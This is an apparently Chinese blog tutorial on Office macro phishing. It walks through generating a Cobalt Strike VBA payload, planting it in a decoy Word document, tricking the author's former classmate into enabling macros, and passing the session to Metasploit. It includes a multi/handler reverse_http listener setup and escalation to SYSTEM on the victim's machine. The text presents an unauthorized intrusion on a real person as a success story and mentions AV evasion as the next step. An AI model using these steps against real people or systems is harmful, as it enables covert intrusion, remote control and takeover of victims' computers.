前言
本文发布已获得本人授权!本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。
一、office宏介绍
宏是微软公司为其OFFICE软件包设计的一个特殊功能,软件设计者为了让人们在使用软件进行工作时,避免一再地重复相同的动作而设计出来的一种工具,它利用简单的语法,把常用的动作写成宏,当在工作时,就可以直接利用事先编好的宏自动运行,去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。
宏病毒是一种常见的计算机病毒,寄存在文档或模板中,并不会直接感染可执行程序。但是打开携带宏病毒的文档,其中的命令就会被执行,导致文档所在电脑主机被感染。
office宏钓鱼就是在无需交互、用户无感知的情况下,执行Office文档中内嵌的一段恶意代码,从远控地址中下载并运行恶意可执行程序。例如:远控木马或者勒索病毒等。
二、宏病毒生成
使用CS自带的钓鱼模块生成vba恶意代码
将代码复制 (上面有英文版的操作步骤)
新建一个word 选用开发者工具
选项宏---新建宏----随便命名宏名---清楚原本的内容----将cs上的payload复制到里面---保存宏
最后将word命名为Word 97-2003格式的doc (高版本docx本机可上线,不理解win7为何不上线)
命一个吸引人的名字,里面是没有内容的
鱼竿有了就差鱼饵了
三、诱导
让我想起我高中同学,高中的时候老是欺负我,老让我给他端洗脚水;但出了校门感情还是很好;今天就拿他试试水。
不上钩,但他有点好奇了。
近在咫尺 (只要点击启用 宏病毒就会生效)
成功上线!
四、攻击
我习惯用msf,msf和cs联动;cs派生给msf会话
msf启用监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_http (此监听要和cs监听一致)
set lhost x.x.x.x
set lport xxxx
run
cs 建立反向监听
尝试msf自动提权 (直接返回SYSTEM权限!)
直接返回SYSTEM权限,太轻松了。既然都进来了留个纸条吧(编码问题 无法显示)
五、总结
因目标环境在学校机房中,并无安装杀毒软件,导致office宏钓鱼很容易的就上线了,以及提权都是容易的,算是侥幸的。面对个人主机以及企业中是布有各种各样的AV、IPS、IDS,这就大大加大的上线的困难性,需要对对应的AV做免杀处理,绕过AV上线。